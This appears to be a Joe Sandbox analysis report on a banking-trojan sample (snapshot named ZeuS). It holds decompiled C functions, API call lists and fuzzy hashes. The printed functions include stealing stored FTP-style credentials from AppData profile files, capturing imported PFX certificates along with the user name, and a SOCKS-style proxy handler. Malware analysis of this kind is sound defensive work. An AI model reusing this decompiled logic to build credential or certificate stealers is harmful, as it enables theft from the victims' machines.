    • Part of subcall function 004093C0: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00415F8F,?,?), ref: 004093D8
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Open$Enum$CloseEnvironmentExpandStrings
  • String ID:
  • API String ID: 2343474859-0
  • Opcode ID: 6bee3734de0677ff5cec88de0979f6cb701532c2cd88493491889831b0b5f261
  • Instruction ID: c7a608af6083e3b4fffc628faee5a2b520e57ed20c9f8653f7e3a3391f06ff90
  • Opcode Fuzzy Hash: 6bee3734de0677ff5cec88de0979f6cb701532c2cd88493491889831b0b5f261
  • Instruction Fuzzy Hash: AA513E72900508ABDB20DBA5DD45BEFB7BDEF84314F104176F905F3291EB38AA858B64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
			E0040F4E0(void* __eflags, intOrPtr _a4) {
				signed int _v5;
				short _v20;
				char _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				short _v664;
				char _v1184;
				short _v1704;
				char _v2224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				long _t33;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				long _t50;
				short* _t58;
				char* _t65;
				short _t66;
				void* _t67;
				WCHAR* _t70;
				long _t77;

				_t31 = 0x2a;
				E0040F34A(_t31,  &_v144);
				_t33 =  &_v1184;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
				if(_t33 == 0) {
					_t33 = E0040AA77( &_v144,  &_v1184,  &_v1184);
					if(_t33 != 0) {
						_t36 = 0x2c;
						E0040F34A(_t36,  &_v112);
						_t33 = E0040AA77( &_v112,  &_v1704,  &_v1184);
						if(_t33 != 0) {
							_t33 = GetFileAttributesW( &_v1704);
							if(_t33 != 0xffffffff) {
								_t42 = 0x2d;
								E0040F34A(_t42,  &_v60);
								_t44 = 0x2e;
								E0040F34A(_t44,  &_v84);
								_t46 = 0x2f;
								E0040F34A(_t46,  &_v20);
								_v5 = 0;
								while(1) {
									_push(_v5 & 0x000000ff);
									_push( &_v60);
									_t67 = 0xa;
									_t70 =  &_v40;
									_t50 = E00405ED9( &_v60, _t67, _t70);
									if(_t50 < 1) {
										break;
									}
									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
									_t77 = _t50;
									if(_t77 == 0xffffffff) {
										break;
									}
									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
									if(_t50 == 0) {
										L17:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									_t58 =  &_v664;
									if(_v664 == 0) {
										L12:
										if(_t77 != 1) {
											_t65 =  &_v664;
											L16:
											_t50 = E0040F667(0, _t65, _a4, _t90);
											if(_t50 == 0) {
												break;
											}
											goto L17;
										}
										_t50 = E0040AA77( &_v664,  &_v2224,  &_v1184);
										_t90 = _t50;
										if(_t50 == 0) {
											goto L17;
										}
										_t65 =  &_v2224;
										goto L16;
									} else {
										goto L9;
									}
									do {
										L9:
										if( *_t58 == 0x2f) {
											_t66 = 0x5c;
											 *_t58 = _t66;
										}
										_t58 = _t58 + 2;
									} while ( *_t58 != 0);
									goto L12;
								}
								return _t50;
							}
						}
					}
				}
				return _t33;
			}

APIs
  • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 0040F507
    • Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96
  • GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0040F55B
  • GetPrivateProfileIntW.KERNEL32 ref: 0040F5BE
  • GetPrivateProfileStringW.KERNEL32 ref: 0040F5EA
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: PathPrivateProfile$AttributesCombineFileFolderString
  • String ID:
  • API String ID: 1702184609-0
  • Opcode ID: a360e97e2af6702cacecb7ea70354453c4d38694314016507e01586a9dd30884
  • Instruction ID: 436428556e4862b939cc1ff52f990e1e9d66d05e4b8a604e29f5c597d88d7f46
  • Opcode Fuzzy Hash: a360e97e2af6702cacecb7ea70354453c4d38694314016507e01586a9dd30884
  • Instruction Fuzzy Hash: BE419D72A00218AEDF20EAA48C45EDF737CAB05314F0045B7F644F75E1D779AE4A8B59
Uniqueness

Uniqueness Score: -1.00%

APIs
  • CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?), ref: 0040B6AB
  • VariantInit.OLEAUT32(?), ref: 0040B6F7
  • SysAllocString.OLEAUT32(?), ref: 0040B707
  • VariantClear.OLEAUT32(?), ref: 0040B740
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Variant$AllocClearCreateInitInstanceString
  • String ID:
  • API String ID: 3126708813-0
  • Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
  • Instruction ID: 906cb429fc123d301df78eacb00a3d31e594a245a2abd642e2d5dc08f81e4d28
  • Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
  • Instruction Fuzzy Hash: BB215E71900224AFCB119BA4CCC8EEF7BB8EF09750F0445B5F906FB291D7B599408BA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040B1A9(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E0040A4F1( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E0040A4D1( *__esi, 0, 0, 2) != 0) {
						_t29 = E0040A4F1( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E00405299( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E0040A4D1( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E0040A4D1( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}

APIs
    • Part of subcall function 0040A4F1: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 0040A506
    • Part of subcall function 0040A4D1: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,0040B182,?,00000000,00000000,00000000,00000000), ref: 0040A4E3
  • WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0040B22A
  • WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0040B243
  • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0040B267
  • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0040B26F
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: File$PointerWrite$BuffersFlush
  • String ID:
  • API String ID: 1289656144-0
  • Opcode ID: 1b70c79d7aee250bc85e933313c7332d14f3057d7f445de79f5f13660f7bede3
  • Instruction ID: 19847be25fcb5b6c213091afc22bc3ab4aca455bc7c3533542e6700c800701b7
  • Opcode Fuzzy Hash: 1b70c79d7aee250bc85e933313c7332d14f3057d7f445de79f5f13660f7bede3
  • Instruction Fuzzy Hash: A7314A76800208FFDF119FA9CC49EAEBBB9EF04344F10857AF690B51A0D33A8955DB58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E004178F4(void* __ebx, void* __ecx) {
				char _v20;
				char* _v84;
				char _v92;
				char _v196;
				char _v716;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t31;
				void* _t35;
				void* _t36;
				char _t37;
				void** _t43;

				_t36 = __ecx;
				_t35 = __ebx;
				_t15 =  *(__ebx + 0x180);
				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
					_t2 = _t35 + 0x17c; // 0x17c
					_t43 = _t2;
					E00406BF5(_t43);
					E0041CC9C(_t36,  &_v716, _t43, 1);
					E0041C946(0x2937498d,  &_v196, 0);
					_t37 = 0x44;
					E00405299( &_v92,  &_v92, 0, _t37);
					_v92 = _t37;
					_v84 =  &_v196;
					ResetEvent( *(_t35 + 0xc));
					if(E00406AAD( &_v716, 0x404a5c, 0,  &_v92,  &_v20) != 0) {
						E00405222(_t43,  &_v20, 0x10);
						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
							goto L6;
						} else {
							TerminateProcess( *_t43, 0);
							E00406BF5(_t43);
							goto L3;
						}
					} else {
						L3:
						_t31 = 0;
					}
				} else {
					L6:
					_t31 = 1;
				}
				return _t31;
			}

APIs
  • WaitForSingleObject.KERNEL32(?,00000000,?,74B5F6F0), ref: 0041790C
  • ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001,?,74B5F6F0), ref: 00417966
  • WaitForSingleObject.KERNEL32(?,000003E8,0000017C,?,00000010,?,00404A5C,00000000,?,?,?,74B5F6F0), ref: 004179A2
  • TerminateProcess.KERNEL32(0000017C,00000000,?,74B5F6F0), ref: 004179AF
    • Part of subcall function 00406BF5: CloseHandle.KERNEL32(?,74B5F560,0040D69A,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 00406C04
    • Part of subcall function 00406BF5: CloseHandle.KERNEL32(?,74B5F560,0040D69A,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 00406C0D
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
  • String ID:
  • API String ID: 401097067-0
  • Opcode ID: fdea1ff227083993a32c430f71c82fb37e5929bc2948f65656ef56ca7baa2d80
  • Instruction ID: ae3d572f0ef769e056b6780fd7fff903f71f8541cac2adee4be0fa97637ad405
  • Opcode Fuzzy Hash: fdea1ff227083993a32c430f71c82fb37e5929bc2948f65656ef56ca7baa2d80
  • Instruction Fuzzy Hash: 9711A2B1500208AAEF10ABA5DC49FEF777CEF45704F00407AF505FA1A5DA789985CE68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00408953(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t16;

				while(1) {
					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
					if(_t16 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						if(_v28.message != 0x12) {
							TranslateMessage( &_v28);
							DispatchMessageW( &_v28);
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t16;
			}

APIs
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: MessageMultipleObjectsPeekWait
  • String ID:
  • API String ID: 3986374578-0
  • Opcode ID: f9295c5c42b952baa99d33bcf44ac01872aaac9d889ff29f2e4e36e76c222aff
  • Instruction ID: 16ad5014ffac0bb05be3796538b3f0bad48346fc68fccfb5046419e96cdb12ee
  • Opcode Fuzzy Hash: f9295c5c42b952baa99d33bcf44ac01872aaac9d889ff29f2e4e36e76c222aff
  • Instruction Fuzzy Hash: C7F0227250020ABBC710BAA8DE48D67BB9CEB41360F05053BF680F21B0D67A980486B6
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0041BD55(void* __eflags) {
				void* _t1;
				long _t6;
				void* _t12;

				_t1 = E0041C97E(_t12, 0x19367401, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					if(E0041CAA4() == 0) {
						L7:
						E004089B9(_t19);
						return 0;
					}
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t6 = WaitForSingleObject( *0x423e74, 0x1388);
					while(_t6 == 0x102) {
						E00404FF7();
						_t6 = WaitForSingleObject( *0x423e74, 0x1388);
					}
					goto L7;
				}
				return _t1 + 1;
			}

APIs
    • Part of subcall function 0041C97E: CreateMutexW.KERNEL32(004239E8,00000000,?,?,?,?,?), ref: 0041C99F
  • GetCurrentThread.KERNEL32 ref: 0041BD79
  • SetThreadPriority.KERNEL32(00000000,?,?,?,19367401,00000001), ref: 0041BD80
  • WaitForSingleObject.KERNEL32(00001388,?,?,?,19367401,00000001), ref: 0041BD98
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
  • String ID:
  • API String ID: 3441234504-0
  • Opcode ID: 96a901a5f2c102acae76c295dc04c3155fb49d03ab27abc9be6df2caa8d37a79
  • Instruction ID: fad477193a557564e7691ba3c19ea697abed2e063f8ab1d10e928d39800346f5
  • Opcode Fuzzy Hash: 96a901a5f2c102acae76c295dc04c3155fb49d03ab27abc9be6df2caa8d37a79
  • Instruction Fuzzy Hash: E3F059716001182AD6223BB17D45DEB7A0CCF95395B200177B900E21B2CA794C8146BC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%
			E004110BE(void* __eflags, signed int _a4) {
				char _v9;
				char _v13;
				char _v20;
				signed int _v24;
				signed int _v29;
				short _v31;
				signed char _v32;
				intOrPtr _v36;
				signed int _v48;
				short _v50;
				char _v52;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				void* _t61;
				short _t77;
				void* _t79;
				void* _t84;
				char _t103;
				char* _t105;
				signed int _t115;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				void* _t131;
				intOrPtr _t132;
				void* _t133;

				_t110 = _a4;
				_t59 = E0040879E(_t110);
				_push(0);
				_push( &_v32);
				_t61 = 7;
				_v24 = 0 | _t59 == 0x00000017;
				if(E00408199(_t61, _t110) != 0) {
					while(E00408199(1, _t110,  &_v9, 0) != 0) {
						if(_v9 == 0) {
							_t115 = _v29;
							_t116 = _t115 << 0x10;
							_v13 = 0x5a;
							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L20:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L44:
									return E00411048(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
								}
								E00405299( &_v52,  &_v52, 0, 0x10);
								_t77 = 2;
								_v52 = _t77;
								_t79 = (_v32 & 0x000000ff) - 1;
								if(_t79 == 0) {
									_v50 = _v31;
									_v48 = _v29;
									_t127 = E0040822E( &_v52);
									if(_t127 == 0xffffffff) {
										L23:
										_v13 = 0x5b;
										goto L44;
									}
									E004085E1(_t116, _t127);
									_t84 = E00411048(_t110, _t127, 0x5a, _v24);
									if(_t84 != 1) {
										if(_t84 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										_push(_t127);
										_t84 = E004083E2(_t110);
									}
									E00408589(_t84, _t127);
									if(_v9 != 1 || _v13 == 0x5a) {
										L34:
										return _v9;
									} else {
										goto L44;
									}
								}
								if(_t79 == 1) {
									_t129 = E00408328( &_v52, 1);
									_v20 = _t129;
									if(_t129 == 0xffffffff) {
										goto L23;
									}
									_t125 = E00411048(_t110, _t129, 0x5a, _v24);
									if(_t125 != 1) {
										L31:
										E00408589(_t89, _t129);
										if(_t125 == 0xffffffff) {
											goto L23;
										}
										if(_t125 != 1) {
											_v9 = 0;
										}
										goto L34;
									}
									_t126 = E00408559( &_v20,  &_a4);
									_v36 = _t126;
									E00408589(_t93, _v20);
									if(_t126 != 0xffffffff) {
										E004085E1(_t116, _t126);
										_t110 = _a4;
										_t125 = E00411048(_a4, _t126, 0x5a, _v24 | 0x00000002);
										if(_t125 == 1) {
											_push(_v36);
											_t89 = E004083E2(_t110);
										}
										_t129 = _v36;
										goto L31;
									}
									_t110 = _a4;
									_v13 = 0x5b;
									goto L44;
								}
								goto L23;
							}
							_t131 = 0;
							while(1) {
								_t116 = _t110;
								if(E00408199(1, _t110,  &_v9, 0) == 0) {
									goto L1;
								}
								_t103 = _v9;
								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
								if(_t103 == 0) {
									_t105 =  &_v312;
									_v20 = 0;
									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
									if(_t105 == 0) {
										_t132 = _v20;
										while(_t132 != 0) {
											if( *((intOrPtr*)(_t132 + 4)) == 2) {
												E00405222( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t132 == 0) {
													goto L12;
												}
												goto L20;
											}
											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v13 = 0x5b;
									goto L20;
								}
								_t131 = _t131 + 1;
								if(_t131 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}

APIs
    • Part of subcall function 0040879E: getsockname.WS2_32(?,?,?), ref: 004087BC
  • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0041118D
  • freeaddrinfo.WS2_32(?,?,?,00000004), ref: 004111C6
    • Part of subcall function 004085E1: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004085F7
    • Part of subcall function 00411048: getpeername.WS2_32(000000FF,?,00000000), ref: 0041106C
    • Part of subcall function 004083E2: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00408482
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
  • String ID: Z
  • API String ID: 1849152701-1505515367
  • Opcode ID: bda9a7b6216f852b020a8c429b5e94f4953ee913da99c167451cc2c56e3fce04
  • Instruction ID: 94da23fed4b34e9fc977b9c1c59079a4126003b2e47befe39d186e74c2070c30
  • Opcode Fuzzy Hash: bda9a7b6216f852b020a8c429b5e94f4953ee913da99c167451cc2c56e3fce04
  • Instruction Fuzzy Hash: 1F612771D00159BADF2097A88C41AFFBBB99F49354F00056BEB51F32E1C67C8985C76A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 60%
			E0040D1AA(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t71;
				char* _t74;
				signed int _t76;
				void* _t78;
				void* _t79;

				_t61 = __ecx;
				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
				_t59 = _a4;
				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
				_v776 = __eax;
				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E0041CAA4() != 0) {
					GetSystemTime( &_v760);
					E0040F34A(0xaa,  &_v600);
					_t74 =  &_v744;
					E0040F34A(0xab, _t74);
					E0040CF89( &_v536, _t61);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t74);
					_push( &_v536);
					_push( &_v600);
					_t65 = 0x3e;
					_t47 = E00405ED9( &_v600, _t65,  &_v728);
					_t79 = _t78 + 0x18;
					if(_t47 > 0 && E004186BA(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
						_t66 = _a8;
						if(_t66 != 0 &&  *_t66 != 0) {
							 *((short*)(E00405222(_t79 + 0x48 + E00405D35( &_v728) * 2, L".txt", 8) + 8)) = 0;
							_t64 = _t66;
							if(E0040603D(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
								E004186BA(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
								E0040602B( &_v784);
							}
						}
					}
				}
				return _v776;
			}

APIs
  • PFXImportCertStore.CRYPT32(?,?,?), ref: 0040D1C3
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • GetSystemTime.KERNEL32(?), ref: 0040D20F
    • Part of subcall function 0040CF89: GetUserNameExW.SECUR32(00000002,?,?), ref: 0040CF9E
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
  • String ID: .txt
  • API String ID: 1412380219-2195685702
  • Opcode ID: 901ad2a40a4cfbda9a69c4c3d2decc79fb24e7e498ba1897ca12a7d4cbe60e8a
  • Instruction ID: cade90fd5af9558148d6c10b119ad800256c64536d9f0690e5ceebb427ede80a
  • Opcode Fuzzy Hash: 901ad2a40a4cfbda9a69c4c3d2decc79fb24e7e498ba1897ca12a7d4cbe60e8a
  • Instruction Fuzzy Hash: 9431CF31604341ABCB20EF95CD45BABB7A9EF98305F00097FB984A71D1D738D948C76A
Uniqueness

Uniqueness Score: -1.00%

APIs
  • CoCreateInstance.OLE32(00404A38,00000000,00004401,00404A48,?), ref: 00412BFB
  • CoCreateInstance.OLE32(00404A08,00000000,00004401,00404A18,?), ref: 00412C4E
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CreateInstance
  • String ID: D
  • API String ID: 542301482-2746444292
  • Opcode ID: 5bfe643f0e49c06fc9732a4f0190cc34f5f85f7c3735e7efb51cb142788ab48f
  • Instruction ID: b6c6c253125a87d8736695c8f43ed9f275c7928a91f0e650ad4828ee0d1e70bb
  • Opcode Fuzzy Hash: 5bfe643f0e49c06fc9732a4f0190cc34f5f85f7c3735e7efb51cb142788ab48f
  • Instruction Fuzzy Hash: 80317EB2204205AFD710DF54C984EAFB7E8AB84744F00052EFA54E7250E774DC558BAA
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0041D6DE(void* __ecx) {
				signed int _v8;
				void* _v12;
				char _v16;
				char _v364;
				char _v504;
				void* __edi;
				void* _t32;

				if( *0x423f60 == 0) {
					E0041CD2B(0x423e7c, __ecx, 1, 0x423f60);
				}
				_v8 = _v8 & 0x00000000;
				_t30 =  &_v12;
				_v12 = 0x80000001;
				if(RegOpenKeyExW(0x80000001, 0x423f60, 0, 1,  &_v12) != 0) {
					_t32 = 0xffffffffffffffff;
				} else {
					_t32 = E004094B9( &_v12, 0x423e7c,  &_v16,  &_v8);
				}
				if(_t32 != 0xffffffff) {
					if(_v16 == 3) {
						E0041CC4A(_t30,  &_v504);
						if(E0040AF81(_v8, _t30, _t32,  &_v364) == 0) {
							goto L8;
						}
						return _v8;
					}
					L8:
					E004051E6(_v8);
					goto L6;
				} else {
					L6:
					return 0;
				}
			}

APIs
  • RegOpenKeyExW.ADVAPI32(80000001,00423F60,00000000,00000001,?), ref: 0041D71D
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: FreeHeapOpen
  • String ID: `?B$|>B
  • API String ID: 527778110-1785315158
  • Opcode ID: 2ae9f4bc2e17b7b92e88a80f2b32a20041b3887edd93971b1425a059848cf30f
  • Instruction ID: 2adeda7552dcc31da1d879cbc741725ae2f1e5d6a06bef057745dca32a2a01de
  • Opcode Fuzzy Hash: 2ae9f4bc2e17b7b92e88a80f2b32a20041b3887edd93971b1425a059848cf30f
  • Instruction Fuzzy Hash: 1A11A3B2E00108BADB20D6A9DD45BDF77BC9B44364F100277A525E21C0D7BC9B859B59
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%
			E0041492A(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v572;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v52;
				E0040F34A(0x81, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00405299( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v572;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E0040A91B( &_v572,  &_v16, _t37, 1, 2, E0041468F,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E004051E6(_v12);
				}
				return E0041293E(_t29, _v12, 0xcb);
			}

APIs
  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0041497A
